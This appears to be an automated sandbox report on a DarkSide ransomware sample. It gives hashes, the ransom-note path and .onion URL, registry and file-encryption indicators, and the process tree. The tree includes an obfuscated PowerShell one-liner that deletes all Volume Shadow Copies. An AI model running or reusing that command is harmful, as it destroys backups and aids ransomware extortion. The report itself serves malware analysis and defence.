Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
03-06-2024 20:50
Static task
static1
Behavioral task
behavioral1
Sample
00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe
Resource
win10v2004-20240426-en
General
-
Target
00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe
-
Size
259KB
-
MD5
00ca7e42b298d5e2a06050b527abef40
-
SHA1
b343760bff3f0c6adbd9b5b39e65894be6d550a5
-
SHA256
6183d9296b128c378e32228916ec2d34fc1cee19b84bcdcf6ff8dcb2e6492a42
-
SHA512
6e24df07d15b1dbe3da753aa6730685729490285d83397e7f140c592a45d1ecdb33c7cbd15c48bd3c4f803cff55c655f86d7523187a770a434f85f795dcba4c6
-
SSDEEP
6144:j9Iuq5yqBxgxIlrfImRCW2cqv7pLR1N1e9ORXrP4QP:j9Ir5yOxiIlrfspjqwRLT
Malware Config
Extracted
C:\Users\Admin\README.e26f79ad.TXT
darkside
http://darksidfqzcuhtk2.onion/ZPHGS4V186LJE9D41BZPQYMAVTRO61FS5DFITXN3164U5B607T7W51NEY0WV7CT1
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Renames multiple (146) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\e26f79ad.BMP" 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\e26f79ad.BMP" 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe -
Modifies Control Panel 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Desktop\WallpaperStyle = "10" 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.e26f79ad 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.e26f79ad\ = "e26f79ad" 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\e26f79ad\DefaultIcon 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\e26f79ad 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\e26f79ad\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\e26f79ad.ico" 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1564 powershell.exe 2220 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe 2220 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2220 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe Token: SeSecurityPrivilege 2220 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe Token: SeTakeOwnershipPrivilege 2220 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe Token: SeLoadDriverPrivilege 2220 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe Token: SeSystemProfilePrivilege 2220 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe Token: SeSystemtimePrivilege 2220 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe Token: SeProfSingleProcessPrivilege 2220 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe Token: SeIncBasePriorityPrivilege 2220 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe Token: SeCreatePagefilePrivilege 2220 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe Token: SeBackupPrivilege 2220 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe Token: SeRestorePrivilege 2220 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe Token: SeShutdownPrivilege 2220 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe Token: SeDebugPrivilege 2220 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe Token: SeSystemEnvironmentPrivilege 2220 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe Token: SeRemoteShutdownPrivilege 2220 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe Token: SeUndockPrivilege 2220 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe Token: SeManageVolumePrivilege 2220 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe Token: 33 2220 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe Token: 34 2220 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe Token: 35 2220 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe Token: SeDebugPrivilege 1564 powershell.exe Token: SeBackupPrivilege 2100 vssvc.exe Token: SeRestorePrivilege 2100 vssvc.exe Token: SeAuditPrivilege 2100 vssvc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2220 wrote to memory of 1564 2220 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe 29 PID 2220 wrote to memory of 1564 2220 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe 29 PID 2220 wrote to memory of 1564 2220 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe 29 PID 2220 wrote to memory of 1564 2220 00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe 29 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe"C:\Users\Admin\AppData\Local\Temp\00ca7e42b298d5e2a06050b527abef40_NeikiAnalytics.exe"1⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1564
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2100
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5ce50d2693482797ffeb732739f98eaa6
SHA13dcd8c05f84725956426b202c1be170f0c3b4d71
SHA2564d9b4aad8a4acdcd890cbfa7ba14f839ebd116846c4198445a1b79b6a1d94cd9
SHA512dd3f57aad3f6d2a55bd89add7d9df7eac4f4787879525181195e67e1885fb19a658e3e2a15c2a5839d5ec8e1982a3cc6a6f51955814b862b52ed28b41f96f48e
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD58897d3252490b592b7c784a74c0b34f3
SHA18169e18bb714cb2a1e4b59a2d6f35a665d806ee0
SHA25697c9fe63d1e640cf6d796d5ee1ca0953b7c267a5367d309fb2dbbd68ef00eb99
SHA51207a25972678595cdf5589d463a883ebc5761b8fccd8715e26352b7197f5e671128db4cc1d09f9b5e0657c161bd25088699665e7cfb13a50f39b446b98f4e8ec9
-
Filesize
1KB
MD52b8c971078b833a80c3967684055ddc3
SHA1e657e2ca052d0701270e3e3194e8016711da2bc6
SHA256b6552686237ecece9ecbc303880abaadde34da6a31f3086b9d0782198f657ee8
SHA5120f1cb2a9b3c30e106bbac81968206add8f4f00db90877c3447202ee483855e2c8b0c68bdde136604e1a8ab217a15bef11cd096ff8bf87f65e0d805df2b95f670